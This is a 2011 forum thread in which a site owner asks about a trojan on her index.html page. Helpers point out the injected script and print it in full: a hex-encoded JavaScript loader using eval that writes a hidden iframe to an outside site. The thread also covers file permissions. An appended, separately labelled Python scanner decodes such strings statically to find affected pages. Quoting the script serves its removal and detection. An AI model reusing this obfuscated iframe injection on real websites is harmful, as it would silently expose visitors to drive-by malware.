joyces
Posted August 21, 2011

Hi Everyone,

I had a trojan on my index.html page a couple of weeks ago. It was my own fault as I hadn't set the permissions correctly. My index page sits on the server in public_html and feeds into the catalog folder, which also sits at the same level in public_html. Hope that makes sense. I had set the permissions correctly for the catalog folder and as far as I could see the trojan was only on the index page. I took it down and put up a clean emergency stop-gap page (still there at the moment) and set the permissions correctly, and as far as I could see all was now ok.

I have had an e-mail from one of my reps to say that he gets a warning when he goes to my site: "A known bad file was blocked from opening index[1].htm (exploit)"

I have tried visiting my site from a number of different computers, all with anti-virus, but don't get the warning. Can anyone please have a look at this link and let me know if they get a warning, and can anyone tell me whether this means it is a trojan? Also, can anyone tell me how I find out which pages are affected?

http://www.kingsandqueens.org.uk/catalog/index.php?cPath=64_81

Thanks to anyone who can spare the time

Joyces

germ
Posted August 21, 2011

The index.html in the root of the site has a trojan javascript at the very end of the source.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -

Guest
Posted August 21, 2011

Joyces,

This is the script that needs to be removed:

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</script>

Chris

joyces
Posted August 21, 2011

Thank you both so much. Was so worried couldn't sleep, had to get up and check for replies.

I have removed the code. When I was checking the permissions on index.html it had reverted back to 777, although I know I changed it to 644 after I re-read Spooks' great thread on how to secure your site.

I think I also read somewhere that some hosts/servers only work on file permissions of 777 and I think the advice was to "change hosts". Unless anyone knows of an alternative explanation I will pursue that with them tomorrow and if it's true maybe I will then pursue them with a big stick!

Anyway thanks a lot

Joyces

Guest
Posted August 21, 2011

Joyces,

Ensure you have removed ALL malicious code and anomalous files. Hackers often place backdoors on servers which give them unrestricted access to your hosting account.

Chris
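
Added example, not part of the original thread or any poster's code: one way to find which pages are affected is to walk the web root, statically decode quoted hex strings of the kind shown in the script above (nothing is executed), and flag files left world-writable, as the 777 index.html was. The function names, the trigger list and the sample site with its example.invalid URL are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Quoted run of 40+ hex digits (even count): the shape of the encoded string in the post.
HEX_RUN = re.compile(r'["\']((?:[0-9a-fA-F]{2}){20,})["\']')
# Calls that accompany the hex string in this style of injected script (assumed list).
TRIGGERS = ("fromCharCode", "eval(", "document.write", "unescape(")
WEB_EXT = (".html", ".htm", ".php", ".js")

def decode_hex_runs(text):
    """Decode quoted hex runs to text without executing them; keep printable results."""
    texts = (bytes.fromhex(m.group(1)).decode("latin-1") for m in HEX_RUN.finditer(text))
    return [t for t in texts if t.isprintable()]

def scan_tree(root):
    """Return {relative path: {"world_writable", "decoded"}} for suspicious web files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            decoded = decode_hex_runs(text)
            if decoded and any(t in text for t in TRIGGERS):
                mode = os.stat(path).st_mode
                hits[os.path.relpath(path, root)] = {
                    "world_writable": bool(mode & stat.S_IWOTH),  # e.g. mode 777
                    "decoded": decoded,
                }
    return hits

def build_sample_site(root):
    """Constructed sample: a clean catalog page and an index.html with an inert injection."""
    payload = "document.write('<iframe src=\"http://injected.example.invalid/\"></iframe>')"
    script = '<script>var arr="%s";/* fromCharCode loop */eval(t);</script>' % payload.encode().hex()
    pages = {"catalog.php": "<?php echo 'catalog'; ?>", "index.html": "<html>Welcome</html>" + script}
    for name, body in pages.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    os.chmod(os.path.join(root, "index.html"), 0o777)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        print(scan_tree(site))
```

Run against a downloaded copy of public_html, `scan_tree` lists each file carrying this pattern along with the decoded text, so the hidden iframe target can be read without opening the page in a browser.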
This topic is now archived and is closed to further replies.